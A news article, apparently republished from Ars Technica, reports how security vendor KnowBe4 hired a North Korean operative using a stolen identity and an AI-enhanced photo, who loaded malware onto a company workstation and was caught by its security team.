KnowBe4, a US-based security vendor, has revealed that it unwittingly hired a North Korean hacker who attempted to upload malware to the company’s network. KnowBe4 CEO and founder Stu Sjouwerman described the incident in a blog entry This week, he called it a cautionary tale that was fortunately caught before it caused major problems.
“First and foremost: no illegal access was gained and no data was lost, compromised or leaked on any KnowBe4 system,” Sjouwerman wrote. “This is not a data breach notification – there was none. Consider this an organizational learning moment I’m sharing with you. If it can happen to us, it can happen to almost anyone. Don’t let it happen to you.”
KnowBe4 said it was looking for a software engineer for its internal IT AI team. The company hired a person who was believed to be from North Korea and was “using a valid but stolen US-based identity” and a photo that was “enhanced” using AI. There is now an active FBI investigation amid suspicion that the worker is what KnowBe4’s blog post called “an insider/nation-state threat actor.”
KnowBe4 operates in 11 countries and is with headquarters in Florida. Provides security awareness training, including phishing security testing, to corporate clients. If you occasionally receive a message fake phishing email Depending on your employer, you may be working for a company that uses the KnowBe4 service to assess its employees’ ability to spot scams.
The person passed the background check and video interviews
KnowBe4 hired the North Korean hacker through its usual process. “We posted the job, received resumes, conducted interviews, ran background checks, verified references, and hired the person. We sent him his Mac workstation, and the moment he received it, he immediately started loading malware,” the company said.
Although the photo provided to HR was fake, the person who interviewed for the job apparently looked enough like it to pass muster. KnowBe4’s HR team “conducted four video conference interviews on separate occasions, confirming that the individual matched the photo provided on their application,” the post said. “Additionally, a background check and all other standard pre-employment checks were conducted and there were no issues due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The image was ‘enhanced’ using artificial intelligence.”
The two images at the top of this story are a stock photo and what KnowBe4 says is an AI fake based on the stock photo. The stock photo is on the left and the AI fake is on the right.
The employee, referred to as “XXXX” in the blog post, was hired as a principal software engineer. The new employee’s suspicious activities were detected by security software, prompting KnowBe4’s Security Operations Center (SOC) to investigate:
“Fake IT worker from North Korea”
The SOC’s analysis indicated that the malware payload “may have been intentional on the part of the user” and the group “suspected that it could be an insider or nation-state threat actor,” the blog post states.
“We shared the collected data with our friends at Mandiant, a global expert in cybersecurity, and with the FBI to corroborate our initial findings. It turns out that this was a fake IT worker from North Korea,” Sjouwerman wrote.
KnowBe4 said it can’t provide many details because of the FBI’s active investigation. But the person hired for the job could have logged into the company’s computer remotely from North Korea, Sjouwerman explained:
This story originally appeared in Ars Technica.